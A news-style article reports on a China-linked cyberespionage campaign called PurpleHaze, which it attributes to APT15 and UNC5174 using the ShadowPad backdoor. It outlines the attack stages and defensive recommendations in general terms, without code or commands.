PurpleHaze: China-Linked Cyberespionage Campaign Targets 70+ Organizations Worldwide
A major cyberespionage operation linked to China has come to light, affecting more than 70 organizations across the globe. Security researchers at SentinelOne have uncovered an expansive campaign they've named "PurpleHaze", believed to be the work of APT15 and UNC5174—two threat groups with ties to the Chinese government.
Running from July 2024 to March 2025, this campaign quietly infiltrated targets in key industries, including manufacturing, government, finance, telecommunications, and media. Among the victims was a logistics company that handled hardware for SentinelOne, and a South Asian government entity, pointing to how far-reaching and strategic this campaign was.
The attackers used a powerful and stealthy tool called ShadowPad, a modular malware platform that’s become increasingly popular among Chinese APTs. This software allowed them to quietly extract sensitive information while staying under the radar.
What We Know About the Targets
PurpleHaze wasn’t a random attack—it was carefully planned and executed with specific goals in mind. The 70+ affected organizations span across a wide range of sectors:
- Manufacturing companies, particularly those involved in defense and aerospace
- Government ministries and diplomatic agencies in Asia
- Banks and financial institutions, including those involved in international aid
- Telecom providers, especially those working on 5G or satellite networks
- News and media firms, possibly for influence operations or surveillance
This wasn’t just about stealing information—it was about gaining long-term access to systems that could offer ongoing strategic value to China.
Who’s Behind It?
SentinelOne attributes the campaign to APT15 (also known as Ke3chang or Vixen Panda) and a lesser-known group called UNC5174. Both are believed to work under the umbrella of Chinese state-sponsored activity.
APT15 is no stranger to espionage. In the past, the group has been linked to attacks on Western military contractors, foreign ministries, and defense suppliers. They’re known for quiet, long-term surveillance and for using advanced malware to maintain persistent access without detection.
How the Attack Worked
1. Getting In
The attackers used spear-phishing emails to trick specific individuals into giving up access. They also took advantage of known vulnerabilities in public-facing infrastructure and, in some cases, exploited weaknesses in the supply chain to gain entry—such as compromising a logistics firm that worked with SentinelOne.
2. Staying Hidden
Once inside, the attackers deployed ShadowPad, a backdoor that can load plugins as needed, making it both flexible and hard to detect. They also used built-in Windows tools like PowerShell and certutil to carry out their attacks quietly.
3. Stealing Data
Data was gathered and sent back to the attackers using stealthy methods, including encrypted HTTPS connections, DNS tunnels, and hiding data inside images or documents.
4. Covering Their Tracks
The attackers tampered with logs, deleted evidence, and modified system settings to avoid detection and delay response efforts.
Why ShadowPad Is So Dangerous
ShadowPad is one of the most advanced malware tools in use today. Originally tied to APT41, it has since been adopted by multiple Chinese groups. Its modular design allows attackers to load only the features they need, making detection harder. The version used in this campaign had added encryption and stealth features, making it highly customized and difficult to analyze.
A Strategic Play by China?
The scope and precision of the PurpleHaze campaign point to a broader geopolitical strategy. Rather than simple data theft, this looks like an effort to map critical infrastructure, monitor adversaries, and quietly gather intelligence over the long term. The targeting of a SentinelOne logistics partner shows attackers are now going after defenders themselves.
What Organizations Should Do Now
Here are some critical steps to take:
- Assume Breach: Start from the idea that you may already be compromised.
- Look for ShadowPad: Scan for known indicators of compromise and suspicious DNS activity.
- Monitor Lateral Movement: Check for accounts accessing unusual parts of the network.
- Patch Everything: Prioritize updates on edge devices, VPNs, and outdated systems.
- Upgrade Detection: Use EDR/XDR systems that focus on behavior, not just signatures.
Final Thoughts
The PurpleHaze campaign is a clear signal that cyberespionage has become a battleground for global power struggles. This wasn’t a smash-and-grab operation—it was a silent, strategic infiltration. If you’re part of a critical industry, you're a target. It's time to get serious about layered security, threat hunting, and supply chain protection.